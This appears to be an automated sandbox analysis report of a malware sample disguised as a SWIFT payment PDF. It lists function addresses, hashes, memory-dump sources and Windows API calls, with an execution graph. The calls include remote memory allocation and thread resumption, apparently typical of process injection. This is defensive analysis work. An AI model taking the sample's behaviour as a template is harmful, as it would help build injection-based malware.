                  • Opcode Fuzzy Hash: d3b46b7759051dfed7ff73e6ead6386e55e0045d0ac8cc4fca725bff4f6857af
                  • Instruction Fuzzy Hash: 301114BA9003098FDB10DF9AD449A9EFBF5EB48710F10842ED559A7310C375A945CFA5
                  Function 014CB219 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014CB079,00000800,00000000,00000000), ref: 014CB28A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 87e65a83dcde02a10e020842a3557c5aec3355729adaa85b24d048d9b3be5b18
                  • Instruction ID: a9e4c8394f08458544c050c8ae23fdbaf86945dcc3e226fca4de2af12c9a86fe
                  • Opcode Fuzzy Hash: 87e65a83dcde02a10e020842a3557c5aec3355729adaa85b24d048d9b3be5b18
                  • Instruction Fuzzy Hash: 9B1153BA8003088FDB10CFAAC888ADEFBF5EB88310F14802ED559A7310C375A545CFA4
                  Function 04ED8EF8 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: ResumeThread
                  • String ID:
                  • API String ID: 947044025-0
                  • Opcode ID: ac22efaf04a59c66e9b43ecb19cf06fcaaced8c0c7068a43e1cafab854aadb40
                  • Instruction ID: c0a9a17b42f597ea53b1576539792cd45e4bca028584b39a9e1112acd65a1462
                  • Opcode Fuzzy Hash: ac22efaf04a59c66e9b43ecb19cf06fcaaced8c0c7068a43e1cafab854aadb40
                  • Instruction Fuzzy Hash: A8118BB5D003488FDB10EFAAC8457DFFBF5EB88324F108419D069A7280CB35A945CBA5
                  Function 04ED94C0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04ED952E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 74c5585ab3d795cc354ad2066e5fdaba9272eaf3668aebf69902fe01f6cff112
                  • Instruction ID: fbae26d458df20df961efe76282b0694cb5b29e068f91653d2777f56bba8435e
                  • Opcode Fuzzy Hash: 74c5585ab3d795cc354ad2066e5fdaba9272eaf3668aebf69902fe01f6cff112
                  • Instruction Fuzzy Hash: 411167B59003089FCB10DFAAC845ADFBFF5EF88324F148419E519A7250C735A940CFA1
                  Function 04ED8F00 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: ResumeThread
                  • String ID:
                  • API String ID: 947044025-0
                  • Opcode ID: e61b0f19ed476211393e83d46cc7387d367574a8ff3116a137485f2c36415544
                  • Instruction ID: 34c8a4e3f78e93bd581e88ddaa3e45759ef707fdf5a0e6a24062928fd4f36d17
                  • Opcode Fuzzy Hash: e61b0f19ed476211393e83d46cc7387d367574a8ff3116a137485f2c36415544
                  • Instruction Fuzzy Hash: 981166B59003488FDB24EFAAC8457EFFBF5EB88324F248419D459A7240CB34A944CBA5
                  Function 04EDB9E1 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                  Download Yara Rule
                  APIs
                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 04EDBA45
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: MessagePost
                  • String ID:
                  • API String ID: 410705778-0
                  • Opcode ID: 2786a727fadb2a1342a6585aee78a3340f95fe24d35392e70aab38125f678e3a
                  • Instruction ID: 149f4a8d664a4f28f55d93227bc0a3872922fa66c7857ae1ab670174592618e1
                  • Opcode Fuzzy Hash: 2786a727fadb2a1342a6585aee78a3340f95fe24d35392e70aab38125f678e3a
                  • Instruction Fuzzy Hash: AE11F2B98003489FDB10DF9AD885BDEFBF8EB48324F10841AE558A7601D375AA44CFA1
                  Function 014CAF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNELBASE(00000000), ref: 014CAFFE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID:
                  • API String ID: 4139908857-0
                  • Opcode ID: 8874819ed49d6912315605c65d8bd7f062cd6a2b877e2919bc76642592048ef1
                  • Instruction ID: 17602cd2c6d915714d31e39c0ba15d3813c893cfadf6d3f5f34b53130b3e3ecc
                  • Opcode Fuzzy Hash: 8874819ed49d6912315605c65d8bd7f062cd6a2b877e2919bc76642592048ef1
                  • Instruction Fuzzy Hash: D21110B9C003498FDB24DF9AD844ADEFBF4EB88324F10841AD529A7310D375A545CFA1
                  Function 04ED7D40 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                  Download Yara Rule
                  APIs
                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 04EDBA45
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: MessagePost
                  • String ID:
                  • API String ID: 410705778-0
                  • Opcode ID: b568104e60883a8908db6c4962e2856431fb1a562b0442a03b669466d114e46c
                  • Instruction ID: 9b3a2c2e62fd269d773386d221008acb69b55f3e9ff8d5869afc5f8f155b570d
                  • Opcode Fuzzy Hash: b568104e60883a8908db6c4962e2856431fb1a562b0442a03b669466d114e46c
                  • Instruction Fuzzy Hash: 2611F2B58003489FDB10DF9AC889BDEBBF8EB48324F10841AE958A7301D375A944CFA1
                  Function 0146D4C4 Relevance: .1, Instructions: 75COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912028913.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_146d000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d53a1ca04de1113ec52332086e575b54446f16da07c36f205c38d672500ab2e9
                  • Instruction ID: bdec4b874b0ce9ffc21aaca895548b3f3db314bb0ffccb2688d2b4615949c6b7
                  • Opcode Fuzzy Hash: d53a1ca04de1113ec52332086e575b54446f16da07c36f205c38d672500ab2e9
                  • Instruction Fuzzy Hash: F621F471A04240DFDB05DF58D9C0B26BF69FB8831CF24C56AD9490A766C336D816C6A2
                  Function 0146D3D8 Relevance: .1, Instructions: 75COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912028913.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_146d000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c2474df5a99daab420ee4d03639b20be7365290aef235e36a8a7769cc2ea38ab
                  • Instruction ID: 79e8a9094c6fe6e5a7973b3f35042d01854c0aa161920c45ba7aea983fddba8b
                  • Opcode Fuzzy Hash: c2474df5a99daab420ee4d03639b20be7365290aef235e36a8a7769cc2ea38ab
                  • Instruction Fuzzy Hash: B2212771A00244DFDB05DF44C9C0B56BF69FB98328F24C57AD94A0B366C336E856CAA2
                  Function 0147D1D4 Relevance: .1, Instructions: 72COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912069753.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_147d000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5f07945ce9379632b0e21d08fef7925bc53684bf1e61e5990f1ee599f3ab8d96
                  • Instruction ID: 2734351cc54fa3513db264c1368ca8f1612d40ccfeaf775b8f45e69368e0ec1f
                  • Opcode Fuzzy Hash: 5f07945ce9379632b0e21d08fef7925bc53684bf1e61e5990f1ee599f3ab8d96
                  • Instruction Fuzzy Hash: BC21F571A14200EFDB05DF98D9C4B66BBA5FF84324F24CA6ED90A4B362C336D407CA61
                  Function 0147D01C Relevance: .1, Instructions: 72COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912069753.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_147d000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6b9856f31ca6ea1d6e85a50bf45b1be7814fe512f0f7c333faa550d381dff17d
                  • Instruction ID: 62d1ec192a5d50919074a4b4727392a3c7462371f45bfc2b479c021d9cca4cbd
                  • Opcode Fuzzy Hash: 6b9856f31ca6ea1d6e85a50bf45b1be7814fe512f0f7c333faa550d381dff17d
                  • Instruction Fuzzy Hash: D62125B5A04280DFCB16DF58D9C4B56BBA5FF84318F24C56ED90A0B366C336D407CA61
                  Function 0147D006 Relevance: .1, Instructions: 62COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912069753.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_147d000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 170938223c415421a8dcddc5df810cea5f761d8ac959fce4440da526d7ad42a4
                  • Instruction ID: 51da3d625a20e9dbc128c5b4d578d9dfec60786e4a697f92f35ef1dec007b03e
                  • Opcode Fuzzy Hash: 170938223c415421a8dcddc5df810cea5f761d8ac959fce4440da526d7ad42a4
                  • Instruction Fuzzy Hash: 52217F755093C08FDB03CF24D994756BF71EF46218F28C5DAD8498B6A7C33A980ACB62
                  Function 0146D3D3 Relevance: .1, Instructions: 56COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912028913.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_146d000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                  • Instruction ID: 4f691a3eefcbdcca6220172678988635ddedad895ef3143e1c9f1a3cf52f5f81
                  • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                  • Instruction Fuzzy Hash: 8311D276904240CFDB02CF44D5C4B56BF71FB84324F24C2AAD9490B266C33AD856CB92
                  Function 0146D4BF Relevance: .1, Instructions: 56COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912028913.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_146d000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                  • Instruction ID: b499a477ee8621ccb7e537da6caedb5ea5629223c3f331c91fb9ed25aad9c0a2
                  • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                  • Instruction Fuzzy Hash: 5F11B476A04280CFDB16CF54D5C4B16BF71FB84328F24C5AAD9450B666C336D456CB92
                  Function 0147D1CF Relevance: .1, Instructions: 53COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912069753.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_147d000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                  • Instruction ID: 73ae22f2662ffe5cbe09670657bf277852219c176937d501dbdea5e8fde94a77
                  • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                  • Instruction Fuzzy Hash: ED11A975904280DFDB12CF54C5C4B16BBA2FB84224F28C6AAD8494B3A6C33AD40ACB61
                  Function 0146D759 Relevance: .0, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912028913.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_146d000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: de02a871aff880d44ba4b8c068c536f37b9a70965ecadc7e9051a11bd5eeec35
                  • Instruction ID: e91c00393f312239882c21c21633c500fe9375797f40f17496613ca1c244252e
                  • Opcode Fuzzy Hash: de02a871aff880d44ba4b8c068c536f37b9a70965ecadc7e9051a11bd5eeec35
                  • Instruction Fuzzy Hash: E901FC716043849AE7104A59CCC4727BFDCDF5132AF18C41BED490A396C73D9840C673
                  Function 0146D758 Relevance: .0, Instructions: 36COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912028913.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_146d000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a533e4a73d93e95c0f1ce1cdca7767d36a732e6a22eb74181d6822cc0d0f9707
                  • Instruction ID: 4e0c366cd4ee15904b3fe6987870ad179f7afa64868ee2e59563b5be788d774d
                  • Opcode Fuzzy Hash: a533e4a73d93e95c0f1ce1cdca7767d36a732e6a22eb74181d6822cc0d0f9707
                  • Instruction Fuzzy Hash: 49F0AF715043849EE7218E0ACC84B63FFA8EF50629F18C45AED484A297C279A840CAA2

                  Non-executed Functions

                  Function 04EDCE58 Relevance: .3, Instructions: 344COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 765edc6547018ff9ae1e81686a7ffc2fad59573ef94171d3d8c149b8056ad3e3
                  • Instruction ID: d52976d75a4a2dd465e589e741389045ce2df3bebc762cf77aee9a87edafd013
                  • Opcode Fuzzy Hash: 765edc6547018ff9ae1e81686a7ffc2fad59573ef94171d3d8c149b8056ad3e3
                  • Instruction Fuzzy Hash: 89C1DE717016048FEB19DB76C850BAAB7FAAFC8744F2454AED1468B2A0DF35E802CB51
                  Function 04ED65E7 Relevance: .3, Instructions: 322COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 358b9b17058f9ec9a7f82fbbb64734d2d8f773c4ceebf96782a9a2ba2e3bb1db
                  • Instruction ID: 2466fce19e8cd03a67c17800703cff72d39d1670c697e164783bca35f0c39d6b
                  • Opcode Fuzzy Hash: 358b9b17058f9ec9a7f82fbbb64734d2d8f773c4ceebf96782a9a2ba2e3bb1db
                  • Instruction Fuzzy Hash: B8E11A74E102598FCB14DFA9C590AAEFBF2FF89304F249169E454AB356D730A942CF60
                  Function 04ED8680 Relevance: .3, Instructions: 312COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e8e8daad8b2afd4d1d1cb8c24540eb211ab54b5f8d1968c4515bd694693635e6
                  • Instruction ID: 4422145019f17d1972e1e14cd5aaff1c96cc7d0a322b966a1f687c072380db6e
                  • Opcode Fuzzy Hash: e8e8daad8b2afd4d1d1cb8c24540eb211ab54b5f8d1968c4515bd694693635e6
                  • Instruction Fuzzy Hash: 39E1EA74E102198FCB14EFA9C5809AEFBB2FF89304F249569E414AB359D731A942CF61
                  Function 04ED6E78 Relevance: .3, Instructions: 312COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c6bddde2763ab6fcafa53a8a9454f45249c8211acb6418d6a6c466c036c9f903
                  • Instruction ID: b85198cddff8324fef03f3f4af38809e0ecf38736797fe7ed7dfda2fdc26b129
                  • Opcode Fuzzy Hash: c6bddde2763ab6fcafa53a8a9454f45249c8211acb6418d6a6c466c036c9f903
                  • Instruction Fuzzy Hash: 0AE1EA74E102198FCB14DFA9C5809AEFBB2FF89304F249669E414AB355D731AD42CFA1
                  Function 04ED8FB0 Relevance: .3, Instructions: 312COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: be88abc61a9da72bc28552448c827eca619280179769ac8550039473004ebb8a
                  • Instruction ID: 2caa34882a64bea0a0706da09ca4aaa8b0e16f4b16277dd47bd4b07f9e5813e5
                  • Opcode Fuzzy Hash: be88abc61a9da72bc28552448c827eca619280179769ac8550039473004ebb8a
                  • Instruction Fuzzy Hash: 3FE1FDB4E102198FCB14DF99C9909AEFBF2FF89304F249169D414AB356D731A942CF60
                  Function 04ED6A40 Relevance: .3, Instructions: 312COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6fbaabcc274bc2e06f782acac0ae623181bfea203a343e179ff227566128f6f9
                  • Instruction ID: 72d2a4560ead350ad8b716ea98c4c8da44eea5949ea402d54c662b6bde38afc0
                  • Opcode Fuzzy Hash: 6fbaabcc274bc2e06f782acac0ae623181bfea203a343e179ff227566128f6f9
                  • Instruction Fuzzy Hash: 1DE1F874E102198FCB14DFA9C5809AEFBF2FF89304F249169E815AB355D731A982CF61
                  Function 014CD5BC Relevance: .3, Instructions: 264COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 04985fb48d40b3ee5f6ffc9a190c8cc968e95fc7fbcaaf884a67bbd6b7f41790
                  • Instruction ID: 78ea2b3d52bc7d9821cff3be8449b0df1d8f6716f5235892c8bc2eb12488deb0
                  • Opcode Fuzzy Hash: 04985fb48d40b3ee5f6ffc9a190c8cc968e95fc7fbcaaf884a67bbd6b7f41790
                  • Instruction Fuzzy Hash: 8BA16C36E002168FCF05DFB5C8405AEBBB3FF95700B15456EE905AB261DB35E91ACB40
                  Function 04ED6A30 Relevance: .2, Instructions: 151COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 12bea113c77d229f54426f68b201cadd95b6c4fc9f787b1f71d49cb7746cc25d
                  • Instruction ID: 3e1d3ebca279effbc31f94c20cf80032960b4211df461e581cdfc088928353a9
                  • Opcode Fuzzy Hash: 12bea113c77d229f54426f68b201cadd95b6c4fc9f787b1f71d49cb7746cc25d
                  • Instruction Fuzzy Hash: 74611774E102198FCB14DFA9C5805AEFBF2FF89314F24816AD418AB356D735A942CFA0
                  Function 04ED8670 Relevance: .1, Instructions: 128COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 17078b69a58ea8ae98419e74ebb1cdd674ecee60b64674016c3e26b1f11e0eaf
                  • Instruction ID: 6d28df4a1e686232005d39d83ac132b9872ba17cb4f0b399295ab436631ee8d4
                  • Opcode Fuzzy Hash: 17078b69a58ea8ae98419e74ebb1cdd674ecee60b64674016c3e26b1f11e0eaf
                  • Instruction Fuzzy Hash: 7851F974E152198FCB14DFAAC9805AEFBF2BF89304F24C56AD418AB355D730A942CF61

                  Execution Graph

                  Execution Coverage:1.1%
                  Dynamic/Decrypted Code Coverage:5%
                  Signature Coverage:7.8%
                  Total number of Nodes:141
                  Total number of Limit Nodes:8
                  execution_graph 92827 424663 92828 424672 92827->92828 92829 4246fc 92828->92829 92830 4246b9 92828->92830 92833 4246f7 92828->92833 92835 42d3d3 92830->92835 92834 42d3d3 RtlFreeHeap 92833->92834 92834->92829 92838 42b863 92835->92838 92837 4246c9 92839 42b87d 92838->92839 92840 42b88e RtlFreeHeap 92839->92840 92840->92837 92841 42ab23 92842 42ab3d 92841->92842 92845 1392df0 LdrInitializeThunk 92842->92845 92843 42ab65 92845->92843 92957 4242d3 92958 4242ef 92957->92958 92959 424317 92958->92959 92960 42432b 92958->92960 92961 42b4f3 NtClose 92959->92961 92962 42b4f3 NtClose 92960->92962 92963 424320 92961->92963 92964 424334 92962->92964 92967 42d4f3 RtlAllocateHeap 92964->92967 92966 42433f 92967->92966 92968 42e4b3 92969 42e4c3 92968->92969 92970 42e4c9 92968->92970 92971 42d4b3 RtlAllocateHeap 92970->92971 92972 42e4ef 92971->92972 92846 41e103 92847 41e129 92846->92847 92851 41e217 92847->92851 92852 42e5e3 92847->92852 92849 41e1bb 92849->92851 92858 42ab73 92849->92858 92853 42e553 92852->92853 92855 42e5b0 92853->92855 92862 42d4b3 92853->92862 92855->92849 92856 42e58d 92857 42d3d3 RtlFreeHeap 92856->92857 92857->92855 92859 42ab8d 92858->92859 92868 1392c0a 92859->92868 92860 42abb9 92860->92851 92865 42b813 92862->92865 92864 42d4ce 92864->92856 92866 42b830 92865->92866 92867 42b841 RtlAllocateHeap 92866->92867 92867->92864 92869 1392c1f LdrInitializeThunk 92868->92869 92870 1392c11 92868->92870 92869->92860 92870->92860 92871 41b023 92872 41b067 92871->92872 92874 41b088 92872->92874 92875 42b4f3 92872->92875 92876 42b510 92875->92876 92877 42b521 NtClose 92876->92877 92877->92874 92973 411c53 92974 411c65 92973->92974 92979 413e33 92974->92979 92977 42b4f3 NtClose 92978 411c7b 92977->92978 92981 413e59 92979->92981 92980 411c71 92980->92977 92981->92980 92983 413bd3 92981->92983 92986 42b773 92983->92986 92987 42b790 92986->92987 92990 1392c70 LdrInitializeThunk 92987->92990 92988 413bf2 92988->92980 92990->92988 92991 4140d3 92992 4140ed 92991->92992 92997 417a13 92992->92997 92994 41410b 92995 414150 92994->92995 92996 41413f PostThreadMessageW 92994->92996 92996->92995 92998 417a37 92997->92998 92999 417a73 LdrLoadDll 92998->92999 93000 417a3e 92998->93000 92999->93000 93000->92994 93001 418c15 93002 42b4f3 NtClose 93001->93002 93003 418c1f 93002->93003 92878 401ac9 92879 401ad0 92878->92879 92882 42e973 92879->92882 92885 42cfd3 92882->92885 92886 42cff9 92885->92886 92897 407473 92886->92897 92888 42d00f 92896 401b08 92888->92896 92900 41ae33 92888->92900 92890 42d02e 92891 42d043 92890->92891 92915 42b8b3 92890->92915 92911 4275a3 92891->92911 92894 42d052 92895 42b8b3 ExitProcess 92894->92895 92895->92896 92918 416753 92897->92918 92899 407480 92899->92888 92901 41ae5f 92900->92901 92932 41ad23 92901->92932 92904 41aea4 92907 41aec0 92904->92907 92909 42b4f3 NtClose 92904->92909 92905 41ae8c 92906 41ae97 92905->92906 92908 42b4f3 NtClose 92905->92908 92906->92890 92907->92890 92908->92906 92910 41aeb6 92909->92910 92910->92890 92912 4275fd 92911->92912 92914 42760a 92912->92914 92943 418563 92912->92943 92914->92894 92916 42b8cd 92915->92916 92917 42b8de ExitProcess 92916->92917 92917->92891 92919 416767 92918->92919 92921 416794 92919->92921 92923 416780 92919->92923 92931 42a453 RtlFreeHeap LdrInitializeThunk 92919->92931 92924 42bf43 92921->92924 92923->92899 92926 42bf5b 92924->92926 92925 42bf7f 92925->92923 92926->92925 92927 42ab73 LdrInitializeThunk 92926->92927 92928 42bfd1 92927->92928 92929 42d3d3 RtlFreeHeap 92928->92929 92930 42bfe7 92929->92930 92930->92923 92931->92921 92933 41ae19 92932->92933 92934 41ad3d 92932->92934 92933->92904 92933->92905 92938 42ac13 92934->92938 92937 42b4f3 NtClose 92937->92933 92939 42ac2d 92938->92939 92942 13935c0 LdrInitializeThunk 92939->92942 92940 41ae0d 92940->92937 92942->92940 92945 41858d 92943->92945 92944 4189fb 92944->92914 92945->92944 92951 413db3 92945->92951 92947 41869a 92947->92944 92948 42d3d3 RtlFreeHeap 92947->92948 92949 4186b2 92948->92949 92949->92944 92950 42b8b3 ExitProcess 92949->92950 92950->92944 92955 413dc9 92951->92955 92953 413e24 92953->92947 92954 413e2c 92954->92947 92955->92954 92956 41b143 RtlFreeHeap LdrInitializeThunk 92955->92956 92956->92953 93004 1392b60 LdrInitializeThunk

                  Executed Functions

                  Function 00417A13 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 186 417a13-417a2f 187 417a37-417a3c 186->187 188 417a32 call 42e0d3 186->188 189 417a42-417a50 call 42e5f3 187->189 190 417a3e-417a41 187->190 188->187 193 417a60-417a71 call 42caa3 189->193 194 417a52-417a5d call 42e893 189->194 199 417a73-417a87 LdrLoadDll 193->199 200 417a8a-417a8d 193->200 194->193 199->200
                  APIs
                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A85
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_swift_payment_pdf.jbxd
                  Yara matches
                  Similarity
                  • API ID: Load
                  • String ID:
                  • API String ID: 2234796835-0
